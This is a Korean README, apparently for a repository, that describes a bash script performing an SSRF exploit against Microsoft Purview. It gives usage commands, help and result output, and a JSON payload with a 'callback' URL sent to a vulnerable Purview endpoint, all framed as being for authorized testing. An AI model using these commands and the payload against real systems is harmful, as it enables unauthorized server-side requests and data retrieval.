
Microsoft Purview의 SSRF 취약점
이 저장소는 테스트 및 교육 목적으로 SSRF(Server-Side Request Forgery, 서버 측 요청 위조) 익스플로잇을 수행하도록 설계된 스크립트를 포함합니다. 이 도구는 책임감 있게 사용하고, 명시적인 허가를 받은 환경에서만 사용하십시오.
bash (Unix 셸)jq (JSON 프로세서)curl (HTTP 요청용 명령줄 도구)./script.sh --exploit <target_url> <purview_url>
| 옵션 | 설명 |
|---|---|
-h, --help | 도움말 메뉴를 표시합니다. |
--exploit tu pu | 대상 및 purview URL을 사용하여 SSRF 익스플로잇을 수행합니다. |
./script.sh -h
출력:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
예상 출력:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url로 전송하여 SSRF 취약점을 익스플로잇하려고 시도합니다../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
HTTP 응답 코드와 본문이 저장되며, 상태 코드에 따라 익스플로잇의 성공 또는 실패가 결정됩니다.
이 스크립트는 테스트 목적으로만 사용됩니다. 이 스크립트의 오용은 심각한 법적 결과를 초래할 수 있습니다. 모든 관련 법률 및 윤리 기준을 준수하십시오.
풀 리퀘스트를 생성하거나 이슈를 보고하여 자유롭게 기여하십시오.
이 도구는 교육 목적 및 공인된 침투 테스트 전용으로 제작되었습니다. 저자는 이 도구로 인해 발생하는 어떠한 오용 또는 손해에 대해서도 책임을 지지 않습니다.